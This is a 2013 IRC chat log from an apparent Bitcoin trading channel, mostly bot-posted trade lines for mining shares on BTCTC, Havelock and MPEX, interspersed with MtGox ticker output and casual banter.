[BTCTC] [TAT.ASICMINER] 1 @ 0.02211 BTC [+] Sep 05 06:15:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.0221 = 0.0442 BTC [-] Sep 05 06:16:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.0221 = 0.221 BTC [-] Sep 05 06:16:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.022 = 0.044 BTC [-] Sep 05 06:16:24 [HAVELOCK] [AM100] 7 @ 0.02265 = 0.1586 BTC [+] Sep 05 06:17:10 [HAVELOCK] [SDSTM] 1 @ 0.00261 BTC [-] Sep 05 06:18:13 [MPEX] [S.MPOE] 4159 @ 0.00088299 = 3.6724 BTC [+] Sep 05 06:18:14 [MPEX] [S.MPOE] 5664 @ 0.00088327 = 5.0028 BTC [+] Sep 05 06:21:12 soo... one page of trade spam, mpex does 90%+ of the total btc volume in two lines. Sep 05 06:21:13 [HAVELOCK] [SMG] 1205 @ 0.0001752 = 0.2111 BTC [+] Sep 05 06:21:15 [HAVELOCK] [SMG] 1195 @ 0.0001751 = 0.2092 BTC [-] Sep 05 06:21:15 ima go to sleep. Sep 05 06:21:25 LOL Sep 05 06:21:36 night baby popescu **** BEGIN LOGGING AT Thu Sep 5 15:23:28 2013 Sep 05 15:23:46 [BTCTC] [ACTIVEMINING] 3 @ 0.004204 = 0.0126 BTC [-] Sep 05 15:25:29 "What are the contingency plans if difficulty shoots through the roof?" Asks the mining farm shareholder Sep 05 15:25:48 not realizing he *is* the contingency plan Sep 05 15:25:52 [BTCTC] [TAT.ASICMINER] 15 @ 0.0223 = 0.3345 BTC [-] Sep 05 15:25:53 [BTCTC] [TAT.ASICMINER] 9 @ 0.02211 = 0.199 BTC [-] Sep 05 15:25:55 [BTCTC] [TAT.ASICMINER] 11 @ 0.0221 = 0.2431 BTC [-] Sep 05 15:25:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.02201 = 0.066 BTC [-] Sep 05 15:25:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.022 BTC [-] Sep 05 15:25:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.022 BTC [-] Sep 05 15:27:19 lol Sep 05 15:27:39 "You take out your credit card, buy more bitcoin, send it over." is the contingency plan. Sep 05 15:27:42 [BTCTC] [ASICMINER-PT] 2 @ 2.313 = 4.626 BTC [-] Sep 05 15:27:44 [BTCTC] [ASICMINER-PT] 2 @ 2.31 = 4.62 BTC [-] Sep 05 15:27:44 [BTCTC] [ASICMINER-PT] 4 @ 2.303 = 9.212 BTC [-] Sep 05 15:27:45 [BTCTC] [ASICMINER-PT] 10 @ 2.302 = 23.02 BTC [-] Sep 05 15:27:46 [BTCTC] [ASICMINER-PT] 1 @ 2.301 BTC [-] Sep 05 15:27:48 [BTCTC] [ASICMINER-PT] 1 @ 2.301 BTC [-] Sep 05 15:27:49 [BTCTC] [ASICMINER-PT] 5 @ 2.301 = 11.505 BTC [-] Sep 05 15:27:50 [BTCTC] [ASICMINER-PT] 1 @ 2.301 BTC [-] Sep 05 15:27:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.02199 BTC [-] Sep 05 15:27:52 [BTCTC] [ASICMINER-PT] 10 @ 2.301 = 23.01 BTC [-] Sep 05 15:27:53 [BTCTC] [ASICMINER-PT] 5 @ 2.301 = 11.505 BTC [-] Sep 05 15:27:54 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Sep 05 15:27:55 [BTCTC] [ASICMINER-PT] 15 @ 2.3 = 34.5 BTC [-] Sep 05 15:27:55 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Sep 05 15:27:57 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Sep 05 15:27:58 [BTCTC] [ASICMINER-PT] 5 @ 2.3 = 11.5 BTC [-] Sep 05 15:27:59 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Sep 05 15:28:00 [BTCTC] [ASICMINER-PT] 10 @ 2.3 = 23 BTC [-] Sep 05 15:28:01 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Sep 05 15:28:02 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Sep 05 15:28:03 [BTCTC] [ASICMINER-PT] 2 @ 2.3 = 4.6 BTC [-] Sep 05 15:28:04 [BTCTC] [ASICMINER-PT] 2 @ 2.3 = 4.6 BTC [-] Sep 05 15:28:05 [BTCTC] [ASICMINER-PT] 2 @ 2.379 = 4.758 BTC [+] Sep 05 15:28:25 [BTCTC] [ASICMINER-PT] 2 @ 2.379 = 4.758 BTC [+] Sep 05 15:29:44 [BTCTC] [ACTIVEMINING] 1 @ 0.004619 BTC [+] Sep 05 15:31:06 [BTCTC] [LABCOIN] 5 @ 0.003513 = 0.0176 BTC [+] Sep 05 15:31:09 [BTCTC] [LABCOIN] 68 @ 0.003513 = 0.2389 BTC [+] Sep 05 15:39:36 [HAVELOCK] [XBOND] 9 @ 0.00112 = 0.0101 BTC [+] Sep 05 15:40:04 [HAVELOCK] [SMG] 1 @ 0.000234 BTC [+] Sep 05 15:40:14 [HAVELOCK] [AM100] 6 @ 0.02198999 = 0.1319 BTC [-] Sep 05 15:46:58 [BTCTC] [ASICMINER-PT] 1 @ 2.288 BTC [-] Sep 05 15:46:59 [BTCTC] [ASICMINER-PT] 2 @ 2.277 = 4.554 BTC [-] Sep 05 15:47:00 [BTCTC] [ASICMINER-PT] 2 @ 2.276 = 4.552 BTC [-] Sep 05 15:47:01 [BTCTC] [ASICMINER-PT] 11 @ 2.275 = 25.025 BTC [-] Sep 05 15:47:02 [BTCTC] [ASICMINER-PT] 1 @ 2.263 BTC [-] Sep 05 15:47:03 [BTCTC] [ASICMINER-PT] 4 @ 2.261 = 9.044 BTC [-] Sep 05 15:47:04 [BTCTC] [ASICMINER-PT] 10 @ 2.26 = 22.6 BTC [-] Sep 05 15:47:05 [BTCTC] [ASICMINER-PT] 7 @ 2.26 = 15.82 BTC [-] Sep 05 15:47:06 [BTCTC] [ASICMINER-PT] 7 @ 2.26 = 15.82 BTC [-] Sep 05 15:47:08 [BTCTC] [ASICMINER-PT] 5 @ 2.26 = 11.3 BTC [-] Sep 05 15:47:09 [BTCTC] [ASICMINER-PT] 2 @ 2.255 = 4.51 BTC [-] Sep 05 15:47:10 [BTCTC] [ASICMINER-PT] 2 @ 2.255 = 4.51 BTC [-] Sep 05 15:47:11 [BTCTC] [ASICMINER-PT] 1 @ 2.254 BTC [-] Sep 05 15:47:11 [BTCTC] [ASICMINER-PT] 5 @ 2.253 = 11.265 BTC [-] Sep 05 15:47:12 [BTCTC] [ASICMINER-PT] 5 @ 2.252 = 11.26 BTC [-] Sep 05 15:47:13 [BTCTC] [ASICMINER-PT] 1 @ 2.251 BTC [-] Sep 05 15:47:14 [BTCTC] [ASICMINER-PT] 3 @ 2.25 = 6.75 BTC [-] Sep 05 15:47:15 [BTCTC] [ASICMINER-PT] 5 @ 2.25 = 11.25 BTC [-] Sep 05 15:47:16 [BTCTC] [ASICMINER-PT] 5 @ 2.232 = 11.16 BTC [-] Sep 05 15:47:17 [BTCTC] [ASICMINER-PT] 3 @ 2.205 = 6.615 BTC [-] Sep 05 15:47:18 [BTCTC] [ASICMINER-PT] 2 @ 2.201 = 4.402 BTC [-] Sep 05 15:47:19 [BTCTC] [ASICMINER-PT] 15 @ 2.2 = 33 BTC [-] Sep 05 15:47:20 [BTCTC] [ASICMINER-PT] 1 @ 2.2 BTC [-] Sep 05 15:47:21 [BTCTC] [ASICMINER-PT] 1 @ 2.2 BTC [-] Sep 05 15:47:22 [BTCTC] [ASICMINER-PT] 5 @ 2.2 = 11 BTC [-] Sep 05 15:47:23 [BTCTC] [ASICMINER-PT] 1 @ 2.188 BTC [-] Sep 05 15:49:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.0218 BTC [-] Sep 05 15:50:12 [BTCTC] [ACTIVEMINING] 5 @ 0.004568 = 0.0228 BTC [-] Sep 05 15:54:00 [BTCTC] [TAT.ASICMINER] 41 @ 0.0218 = 0.8938 BTC [-] Sep 05 15:54:02 [BTCTC] [TAT.ASICMINER] 9 @ 0.0218 = 0.1962 BTC [-] Sep 05 15:56:13 [BTCTC] [DMS.MINING] 1 @ 0.002302 BTC [-] Sep 05 15:56:21 [HAVELOCK] [AM1] 4 @ 2.26 = 9.04 BTC [-] Sep 05 15:56:24 [HAVELOCK] [AM1] 6 @ 2.25 = 13.5 BTC [-] Sep 05 15:56:26 [HAVELOCK] [AM1] 4 @ 2.22 = 8.88 BTC [-] Sep 05 15:56:28 [HAVELOCK] [AM1] 1 @ 2.21 BTC [-] Sep 05 15:57:21 [BTCTC] [DMS.MINING] 20 @ 0.002301 = 0.046 BTC [-] Sep 05 15:58:01 [BTCTC] [DMS.MINING] 793 @ 0.0023 = 1.8239 BTC [-] Sep 05 15:58:29 [BTCTC] [ASICMINER-PT] 1 @ 2.358 BTC [+] Sep 05 15:58:31 [BTCTC] [ASICMINER-PT] 6 @ 2.359 = 14.154 BTC [+] Sep 05 15:58:32 [BTCTC] [ASICMINER-PT] 1 @ 2.361 BTC [+] Sep 05 15:58:46 [BTCTC] [DMS.MINING] 90 @ 0.002231 = 0.2008 BTC [-] Sep 05 15:59:14 [BTCTC] [DMS.MINING] 173 @ 0.002222 = 0.3844 BTC [-] Sep 05 15:59:51 [BTCTC] [DMS.MINING] 700 @ 0.00222 = 1.554 BTC [-] Sep 05 16:00:27 [BTCTC] [CRYPTO-TRADE] 4 @ 0.198 = 0.792 BTC [-] Sep 05 16:00:36 [BTCTC] [DMS.MINING] 50 @ 0.002211 = 0.1106 BTC [-] Sep 05 16:01:24 [BTCTC] [DMS.MINING] 370 @ 0.002202 = 0.8147 BTC [-] Sep 05 16:01:51 [BTCTC] [DMS.MINING] 200 @ 0.0022 = 0.44 BTC [-] Sep 05 16:02:06 [BTCTC] [ASICMINER-PT] 4 @ 2.29 = 9.16 BTC [-] Sep 05 16:03:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.0214 BTC [-] Sep 05 16:03:03 [BTCTC] [KENILWORTH] 1 @ 0.001797 BTC [+] Sep 05 16:03:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.0214 = 0.214 BTC [-] Sep 05 16:03:06 [BTCTC] [TAT.ASICMINER] 4 @ 0.02132 = 0.0853 BTC [-] Sep 05 16:03:07 [BTCTC] [TAT.ASICMINER] 40 @ 0.02131 = 0.8524 BTC [-] Sep 05 16:03:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0211 BTC [-] Sep 05 16:03:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.02108 BTC [-] Sep 05 16:03:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.02107 = 0.0421 BTC [-] Sep 05 16:03:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.02106 = 0.2106 BTC [-] Sep 05 16:03:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.02106 = 0.0632 BTC [-] Sep 05 16:03:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.02103 = 0.0631 BTC [-] Sep 05 16:03:15 [BTCTC] [TAT.ASICMINER] 19 @ 0.02102 = 0.3994 BTC [-] Sep 05 16:03:16 [BTCTC] [TAT.ASICMINER] 50 @ 0.02101 = 1.0505 BTC [-] Sep 05 16:03:17 [BTCTC] [TAT.ASICMINER] 16 @ 0.021 = 0.336 BTC [-] Sep 05 16:03:28 [BTCTC] [ASICMINER-PT] 2 @ 2.29 = 4.58 BTC [-] Sep 05 16:03:31 [BTCTC] [ASICMINER-PT] 1 @ 2.29 BTC [-] Sep 05 16:07:12 ;;nethash Sep 05 16:07:13 716417.71293 Sep 05 16:08:06 ;;ticker Sep 05 16:08:07 MtGox BTCUSD ticker | Best bid: 131.21500, Best ask: 131.90000, Bid-ask spread: 0.68500, Last trade: 131.21500, 24 hour volume: 39214.46506708, 24 hour low: 127.24164, 24 hour high: 144.99999, 24 hour vwap: 134.38528 Sep 05 16:13:42 [HAVELOCK] [AM100] 2 @ 0.0215 = 0.043 BTC [-] Sep 05 16:14:30 [BTCTC] [ASICMINER-PT] 1 @ 2.22 BTC [-] Sep 05 16:14:32 [BTCTC] [ASICMINER-PT] 1 @ 2.22 BTC [-] Sep 05 16:15:10 [BTCTC] [ASICMINER-PT] 1 @ 2.201 BTC [-] Sep 05 16:15:12 [BTCTC] [ASICMINER-PT] 1 @ 2.2 BTC [-] Sep 05 16:16:06 [HAVELOCK] [SMG] 1 @ 0.00023351 BTC [-] Sep 05 16:18:45 [BTCTC] [TAT.MINIGAME] 1 @ 0.000193 BTC [-] Sep 05 16:22:12 coingenuity " You are grossly unequipped to interact straight with the refuse of Western society." Sep 05 16:22:14 guess who said that :D Sep 05 16:23:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02179 BTC [+] Sep 05 16:23:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.0218 BTC [+] Sep 05 16:27:14 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Sep 05 16:27:28 [BTCTC] [ASICMINER-PT] 2 @ 2.2 = 4.4 BTC [-] Sep 05 16:28:53 Recycling enthusiasts? Sep 05 16:29:30 jk Sep 05 16:29:36 we all know it's you Sep 05 16:29:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.0211 = 0.0422 BTC [-] Sep 05 16:30:26 http://www.theverge.com/2013/9/5/4697042/uk-lawmakers-access-porn-from-parliament-computers Sep 05 16:30:28 :p Sep 05 16:30:30 UK lawmakers reportedly accessing porn from Parliamentary computers | The Verge Sep 05 16:30:51 dude srsly. anyone thought parliamen computers see no porn ? Sep 05 16:31:07 anyway, in exchange : http://www.imacitychanger.org/imacc/story/510-spatial-redefinition-construction-of-a-community-center-over-a-drug-sale-local Sep 05 16:31:26 Tired of insecurity and violence produced by a local drug sale, the neighborhood decided to take action and overthrow the actual space. Sep 05 16:31:59 [BTCTC] [LABCOIN] 5 @ 0.003516 = 0.0176 BTC [+] Sep 05 16:32:01 [BTCTC] [LABCOIN] 10 @ 0.003515 = 0.0352 BTC [-] Sep 05 16:32:02 [BTCTC] [LABCOIN] 132 @ 0.003513 = 0.4637 BTC [-] Sep 05 16:32:03 [BTCTC] [LABCOIN] 500 @ 0.003513 = 1.7565 BTC [-] Sep 05 16:32:05 [BTCTC] [LABCOIN] 70 @ 0.003512 = 0.2458 BTC [-] Sep 05 16:32:06 [BTCTC] [LABCOIN] 571 @ 0.003505 = 2.0014 BTC [-] Sep 05 16:32:07 [BTCTC] [LABCOIN] 10 @ 0.003502 = 0.035 BTC [-] Sep 05 16:32:08 [BTCTC] [LABCOIN] 400 @ 0.0035 = 1.4 BTC [-] Sep 05 16:32:21 [BTCTC] [ASICMINER-PT] 1 @ 2.201 BTC [+] Sep 05 16:32:22 is each labcoin worth 2 am yet ? Sep 05 16:32:25 a not yet. Sep 05 16:32:42 [HAVELOCK] [XBOND] 27 @ 0.00108955 = 0.0294 BTC [-] Sep 05 16:32:46 "the neighbors contacted the STUDIO OF IDEAS to bring forward the project. " Sep 05 16:32:48 [BTCTC] [ACTIVEMINING] 275 @ 0.004399 = 1.2097 BTC [-] Sep 05 16:32:54 the cpps'd that for you Sep 05 16:33:00 caps'd Sep 05 16:33:05 they Sep 05 16:33:08 lol k Sep 05 16:34:24 "LG went to great lengths to research the average hand size in Korea, and has come up with the biggest possible screen size for what it believes is the maximum width (127.29mm) for a single-hand device. " Sep 05 16:34:37 so weird Sep 05 16:34:46 [BTCTC] [DMS.MINING] 31 @ 0.002298 = 0.0712 BTC [+] Sep 05 16:35:34 it is Sep 05 16:35:46 i thought asians had small hands Sep 05 16:36:29 i wonder how much did the 2 cost in dollars, and how much the 9. Sep 05 16:37:10 and whether it will even primarily be sold to koreans Sep 05 16:38:11 now that is prolly a no. Sep 05 16:38:12 [BTCTC] [ACTIVEMINING] 200 @ 0.004441 = 0.8882 BTC [+] Sep 05 16:40:19 [BTCTC] [ACTIVEMINING] 3 @ 0.00439 = 0.0132 BTC [-] Sep 05 16:42:06 [BTCTC] [ASICMINER-PT] 1 @ 2.201 BTC [+] Sep 05 16:42:08 [BTCTC] [ASICMINER-PT] 6 @ 2.2 = 13.2 BTC [-] Sep 05 16:42:09 [BTCTC] [ASICMINER-PT] 2 @ 2.19 = 4.38 BTC [-] Sep 05 16:42:10 [BTCTC] [ASICMINER-PT] 1 @ 2.19 BTC [-] Sep 05 16:42:12 [BTCTC] [ASICMINER-PT] 1 @ 2.182 BTC [-] Sep 05 16:42:13 [BTCTC] [ASICMINER-PT] 1 @ 2.181 BTC [-] Sep 05 16:42:14 [BTCTC] [ASICMINER-PT] 3 @ 2.18 = 6.54 BTC [-] Sep 05 16:42:15 [BTCTC] [ASICMINER-PT] 3 @ 2.18 = 6.54 BTC [-] Sep 05 16:42:16 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [-] Sep 05 16:42:16 [BTCTC] [ASICMINER-PT] 1 @ 2.123 BTC [-] Sep 05 16:42:18 [BTCTC] [ASICMINER-PT] 2 @ 2.122 = 4.244 BTC [-] Sep 05 16:42:19 [BTCTC] [ASICMINER-PT] 1 @ 2.122 BTC [-] Sep 05 16:42:20 [BTCTC] [ASICMINER-PT] 10 @ 2.121 = 21.21 BTC [-] Sep 05 16:42:28 [BTCTC] [ASICMINER-PT] 3 @ 2.12 = 6.36 BTC [-] Sep 05 16:42:28 [BTCTC] [ASICMINER-PT] 1 @ 2.11 BTC [-] Sep 05 16:42:28 [BTCTC] [ASICMINER-PT] 3 @ 2.11 = 6.33 BTC [-] Sep 05 16:42:28 [BTCTC] [ASICMINER-PT] 1 @ 2.109 BTC [-] Sep 05 16:42:28 [BTCTC] [ASICMINER-PT] 1 @ 2.109 BTC [-] Sep 05 16:42:28 [BTCTC] [ASICMINER-PT] 15 @ 2.108 = 31.62 BTC [-] Sep 05 16:42:28 [BTCTC] [ASICMINER-PT] 9 @ 2.105 = 18.945 BTC [-] Sep 05 16:42:28 ooooo Sep 05 16:42:28 [BTCTC] [ASICMINER-PT] 1 @ 2.101 BTC [-] Sep 05 16:42:29 [BTCTC] [ASICMINER-PT] 8 @ 2.1 = 16.8 BTC [-] Sep 05 16:42:35 go go 1.8 Sep 05 16:43:05 rip AM Sep 05 16:43:55 [BTCTC] [LABCOIN] 506 @ 0.003485 = 1.7634 BTC [-] Sep 05 16:43:57 [BTCTC] [LABCOIN] 13 @ 0.003482 = 0.0453 BTC [-] Sep 05 16:43:58 [BTCTC] [LABCOIN] 13 @ 0.003481 = 0.0453 BTC [-] Sep 05 16:43:59 [BTCTC] [TAT.ASICMINER] 7 @ 0.02111 = 0.1478 BTC [+] Sep 05 16:44:00 [BTCTC] [LABCOIN] 37 @ 0.00348 = 0.1288 BTC [-] Sep 05 16:44:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.02111 = 0.2111 BTC [+] Sep 05 16:44:03 [BTCTC] [LABCOIN] 50 @ 0.003479 = 0.174 BTC [-] Sep 05 16:44:04 [BTCTC] [LABCOIN] 46 @ 0.003479 = 0.16 BTC [-] Sep 05 16:44:05 [BTCTC] [TAT.ASICMINER] 8 @ 0.0211 = 0.1688 BTC [-] Sep 05 16:44:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.0211 = 0.0422 BTC [-] Sep 05 16:44:06 [BTCTC] [LABCOIN] 25 @ 0.003478 = 0.087 BTC [-] Sep 05 16:44:07 [BTCTC] [TAT.ASICMINER] 24 @ 0.021 = 0.504 BTC [-] Sep 05 16:44:08 [BTCTC] [LABCOIN] 88 @ 0.003477 = 0.306 BTC [-] Sep 05 16:44:09 [BTCTC] [TAT.ASICMINER] 35 @ 0.021 = 0.735 BTC [-] Sep 05 16:44:10 [BTCTC] [LABCOIN] 22 @ 0.003476 = 0.0765 BTC [-] Sep 05 16:44:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.021 = 0.105 BTC [-] Sep 05 16:44:12 [BTCTC] [LABCOIN] 50 @ 0.003476 = 0.1738 BTC [-] Sep 05 16:44:13 [BTCTC] [TAT.ASICMINER] 120 @ 0.021 = 2.52 BTC [-] Sep 05 16:44:13 [BTCTC] [LABCOIN] 193 @ 0.003472 = 0.6701 BTC [-] Sep 05 16:44:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.021 = 0.063 BTC [-] Sep 05 16:44:15 [BTCTC] [LABCOIN] 575 @ 0.003471 = 1.9958 BTC [-] Sep 05 16:44:17 [BTCTC] [TAT.ASICMINER] 50 @ 0.02099 = 1.0495 BTC [-] Sep 05 16:44:18 [BTCTC] [LABCOIN] 200 @ 0.003471 = 0.6942 BTC [-] Sep 05 16:44:19 [BTCTC] [TAT.ASICMINER] 21 @ 0.02078 = 0.4364 BTC [-] Sep 05 16:44:20 [BTCTC] [LABCOIN] 484 @ 0.00345 = 1.6698 BTC [-] Sep 05 16:44:21 [BTCTC] [TAT.ASICMINER] 100 @ 0.02077 = 2.077 BTC [-] Sep 05 16:44:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.02077 = 0.0831 BTC [-] Sep 05 16:44:29 ;;ticker Sep 05 16:44:29 MtGox BTCUSD ticker | Best bid: 132.49400, Best ask: 132.71010, Bid-ask spread: 0.21610, Last trade: 132.49400, 24 hour volume: 39507.09022110, 24 hour low: 127.24164, 24 hour high: 144.99999, 24 hour vwap: 134.34428 Sep 05 16:44:41 [BTCTC] [LABCOIN] 506 @ 0.003451 = 1.7462 BTC [+] Sep 05 16:44:57 [BTCTC] [BASIC-MINING] 1 @ 0.1553 BTC [+] Sep 05 16:45:21 [BTCTC] [LABCOIN] 448 @ 0.003451 = 1.546 BTC [+] Sep 05 16:45:22 [BTCTC] [LABCOIN] 20 @ 0.00345 = 0.069 BTC [-] Sep 05 16:45:23 [BTCTC] [LABCOIN] 1551 @ 0.003449 = 5.3494 BTC [-] Sep 05 16:45:41 [BTCTC] [LABCOIN] 468 @ 0.003449 = 1.6141 BTC [-] Sep 05 16:45:44 [BTCTC] [ASICMINER-PT] 1 @ 2.101 BTC [+] Sep 05 16:45:46 [BTCTC] [BTC-GROWTH] 1 @ 0.101 BTC [+] Sep 05 16:45:47 [BTCTC] [ASICMINER-PT] 12 @ 2.1 = 25.2 BTC [-] Sep 05 16:45:49 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] Sep 05 16:45:50 [BTCTC] [ASICMINER-PT] 2 @ 2.1 = 4.2 BTC [-] Sep 05 16:45:51 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] Sep 05 16:45:53 [BTCTC] [ASICMINER-PT] 15 @ 2.075 = 31.125 BTC [-] Sep 05 16:45:54 [BTCTC] [ASICMINER-PT] 3 @ 2.05 = 6.15 BTC [-] Sep 05 16:45:54 [BTCTC] [ASICMINER-PT] 1 @ 2.04 BTC [-] Sep 05 16:45:55 [BTCTC] [ASICMINER-PT] 1 @ 2.022 BTC [-] Sep 05 16:45:56 [BTCTC] [ASICMINER-PT] 1 @ 2.021 BTC [-] Sep 05 16:45:57 [BTCTC] [ASICMINER-PT] 8 @ 2.021 = 16.168 BTC [-] Sep 05 16:45:59 [BTCTC] [ASICMINER-PT] 15 @ 2.02 = 30.3 BTC [-] Sep 05 16:46:00 [BTCTC] [ASICMINER-PT] 10 @ 2.013 = 20.13 BTC [-] Sep 05 16:46:01 [BTCTC] [ASICMINER-PT] 10 @ 2.011 = 20.11 BTC [-] Sep 05 16:46:02 [BTCTC] [ASICMINER-PT] 5 @ 2.01 = 10.05 BTC [-] Sep 05 16:46:03 [BTCTC] [ASICMINER-PT] 10 @ 2.01 = 20.1 BTC [-] Sep 05 16:46:04 [BTCTC] [ASICMINER-PT] 5 @ 2.01 = 10.05 BTC [-] Sep 05 16:46:04 [BTCTC] [ASICMINER-PT] 1 @ 2.002 BTC [-] Sep 05 16:46:05 [BTCTC] [ASICMINER-PT] 1 @ 2.001 BTC [-] Sep 05 16:46:06 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] Sep 05 16:46:07 [BTCTC] [ASICMINER-PT] 10 @ 2 = 20 BTC [-] Sep 05 16:46:08 [BTCTC] [ASICMINER-PT] 3 @ 2 = 6 BTC [-] Sep 05 16:46:10 [BTCTC] [ASICMINER-PT] 4 @ 2 = 8 BTC [-] Sep 05 16:46:11 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] Sep 05 16:46:12 [BTCTC] [ASICMINER-PT] 3 @ 2 = 6 BTC [-] Sep 05 16:46:27 [HAVELOCK] [AM1] 9 @ 2.04 = 18.36 BTC [-] Sep 05 16:46:29 [HAVELOCK] [AM1] 2 @ 2.03 = 4.06 BTC [-] Sep 05 16:46:31 [HAVELOCK] [AM1] 1 @ 2.025 BTC [-] Sep 05 16:46:33 [HAVELOCK] [AM1] 1 @ 2.021 BTC [-] Sep 05 16:46:35 [HAVELOCK] [AM1] 1 @ 2.02 BTC [-] Sep 05 16:46:37 [HAVELOCK] [AM1] 3 @ 2.0001 = 6.0003 BTC [-] Sep 05 16:46:39 [HAVELOCK] [AM1] 7 @ 2.00001 = 14.0001 BTC [-] Sep 05 16:46:42 [BTCTC] [ASICMINER-PT] 1 @ 2.001 BTC [+] Sep 05 16:46:43 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] Sep 05 16:47:05 [HAVELOCK] [AM1] 2 @ 1.92 = 3.84 BTC [-] Sep 05 16:47:31 [HAVELOCK] [AM100] 10 @ 0.02040001 = 0.204 BTC [-] Sep 05 16:47:34 [HAVELOCK] [AM100] 1 @ 0.0204 BTC [-] Sep 05 16:47:35 [HAVELOCK] [AM100] 1 @ 0.02035666 BTC [-] Sep 05 16:47:37 [HAVELOCK] [AM100] 1 @ 0.02000002 BTC [-] Sep 05 16:47:39 [HAVELOCK] [AM100] 5 @ 0.02 = 0.1 BTC [-] Sep 05 16:47:54 [BTCTC] [ASICMINER-PT] 1 @ 2.001 BTC [+] Sep 05 16:48:24 [HAVELOCK] [AM100] 3 @ 0.01911 = 0.0573 BTC [-] Sep 05 16:48:33 [HAVELOCK] [AM100] 31 @ 0.01910001 = 0.5921 BTC [-] Sep 05 16:49:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.02189 = 0.0876 BTC [+] Sep 05 16:50:15 [BTCTC] [BASIC-MINING] 5 @ 0.1451 = 0.7255 BTC [-] Sep 05 16:50:17 [BTCTC] [BASIC-MINING] 35 @ 0.145 = 5.075 BTC [-] Sep 05 16:50:45 [BTCTC] [ACTIVEMINING] 250 @ 0.00437 = 1.0925 BTC [-] Sep 05 16:50:46 [BTCTC] [ACTIVEMINING] 8 @ 0.0043 = 0.0344 BTC [-] Sep 05 16:50:48 [BTCTC] [ACTIVEMINING] 20 @ 0.0043 = 0.086 BTC [-] Sep 05 16:50:49 [BTCTC] [ACTIVEMINING] 233 @ 0.004207 = 0.9802 BTC [-] Sep 05 16:50:49 [BTCTC] [ACTIVEMINING] 100 @ 0.004203 = 0.4203 BTC [-] Sep 05 16:50:50 [BTCTC] [ACTIVEMINING] 1000 @ 0.004201 = 4.201 BTC [-] Sep 05 16:50:51 [BTCTC] [ACTIVEMINING] 1031 @ 0.0042 = 4.3302 BTC [-] Sep 05 16:50:53 [BTCTC] [ACTIVEMINING] 1 @ 0.0042 BTC [-] Sep 05 16:50:54 [BTCTC] [ACTIVEMINING] 1000 @ 0.004199 = 4.199 BTC [-] Sep 05 16:50:55 [BTCTC] [ACTIVEMINING] 900 @ 0.00416 = 3.744 BTC [-] Sep 05 16:50:56 [BTCTC] [ACTIVEMINING] 57 @ 0.004159 = 0.2371 BTC [-] Sep 05 16:50:57 [BTCTC] [BASIC-MINING] 26 @ 0.145 = 3.77 BTC [-] Sep 05 16:50:58 [BTCTC] [BASIC-MINING] 63 @ 0.1421 = 8.9523 BTC [-] Sep 05 16:51:00 [BTCTC] [BASIC-MINING] 25 @ 0.142 = 3.55 BTC [-] Sep 05 16:51:00 [BTCTC] [BASIC-MINING] 1 @ 0.141 BTC [-] Sep 05 16:51:01 [BTCTC] [BASIC-MINING] 24 @ 0.141 = 3.384 BTC [-] Sep 05 16:51:02 [BTCTC] [BASIC-MINING] 100 @ 0.1401 = 14.01 BTC [-] Sep 05 16:51:03 [BTCTC] [BASIC-MINING] 10 @ 0.14 = 1.4 BTC [-] Sep 05 16:51:04 [BTCTC] [BASIC-MINING] 1 @ 0.137 BTC [-] Sep 05 16:51:05 [BTCTC] [BASIC-MINING] 2 @ 0.1368 = 0.2736 BTC [-] Sep 05 16:51:06 [BTCTC] [BASIC-MINING] 24 @ 0.1351 = 3.2424 BTC [-] Sep 05 16:51:07 [BTCTC] [BASIC-MINING] 75 @ 0.135 = 10.125 BTC [-] Sep 05 16:51:08 [BTCTC] [BASIC-MINING] 200 @ 0.133 = 26.6 BTC [-] Sep 05 16:51:09 [BTCTC] [BASIC-MINING] 1 @ 0.1325 BTC [-] Sep 05 16:51:10 [BTCTC] [BASIC-MINING] 1 @ 0.1321 BTC [-] Sep 05 16:51:11 [BTCTC] [BASIC-MINING] 200 @ 0.1311 = 26.22 BTC [-] Sep 05 16:51:12 [BTCTC] [BASIC-MINING] 22 @ 0.131 = 2.882 BTC [-] Sep 05 16:51:13 [BTCTC] [BASIC-MINING] 1 @ 0.1308 BTC [-] Sep 05 16:51:14 [BTCTC] [BASIC-MINING] 1 @ 0.1275 BTC [-] Sep 05 16:51:15 [BTCTC] [BASIC-MINING] 10 @ 0.126 = 1.26 BTC [-] Sep 05 16:51:16 [BTCTC] [BASIC-MINING] 1 @ 0.1242 BTC [-] Sep 05 16:51:17 [BTCTC] [BASIC-MINING] 30 @ 0.122 = 3.66 BTC [-] Sep 05 16:51:18 [BTCTC] [BASIC-MINING] 1 